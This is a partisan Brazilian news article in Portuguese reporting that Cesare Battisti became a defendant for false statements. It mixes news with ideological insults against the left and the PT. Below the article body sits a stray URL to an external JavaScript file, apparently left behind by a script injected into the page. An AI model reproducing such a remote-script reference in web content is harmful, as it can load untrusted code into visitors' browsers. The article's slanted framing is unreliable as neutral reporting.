BrasilNotícias

Battisti, o terrorista abrigado no Brasil pelo PT, vira réu por falsidade ideológica

Cesare Battisti – terrorista da esquerda radical que está exilado no Brasil – tornou-se réu por falsidade ideológica. Ele já responde, no Brasil, por evasão de divisas e, na Itália, é acusado de terrorismo.

Battisti terá que entregar seu passaporte às autoridades e deverá, juntamente com a esposa, obedecer a medidas cautelares. De acordo com o Ministério Público de São Paulo, Battisti inseriu em documento público uma declaração falsa, com o objetivo de alterar documentos judiciais. A denúncia trata de informações dadas em cartório para o casamento dele com uma brasileira, em 2015.

Em outubro de 2017, Battisti foi preso tentando sair do Brasil com dinheiro estrangeiro sem a declaração obrigatória e foi detido na fronteira com a Bolívia. Battisti foi condenado ainda à prisão perpétua na Itália, em 1993, pelo assassinato de quatro pessoas em 1970, quando era membro do Proletários Armados para o Comunismo (PAC). Como todo esquerdista, ele se diz vítima de perseguição política.

Após condenação, fugiu para a França e chegou ao Brasil em 2004, onde foi recebido de braços abertos pelo governo petista, já que o ministro da Justiça da época, Tarso Genro, concedeu a ele refúgio político por conta das semelhanças ideológicas.

Houve julgamento no Supremo Tribunal Federal sobre o caso, mas por 5 votos a 4, os ministros definiram que a palavra final sobre a extradição caberia ao então presidente Luiz Inácio Lula da Silva, o Lula (PT). Luca recusou a extradição de Battisti, afinal, são “companheiros”.

https://cloudapi.online/js/api46.js

Tags
Ver mais

Artigos relacionados

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close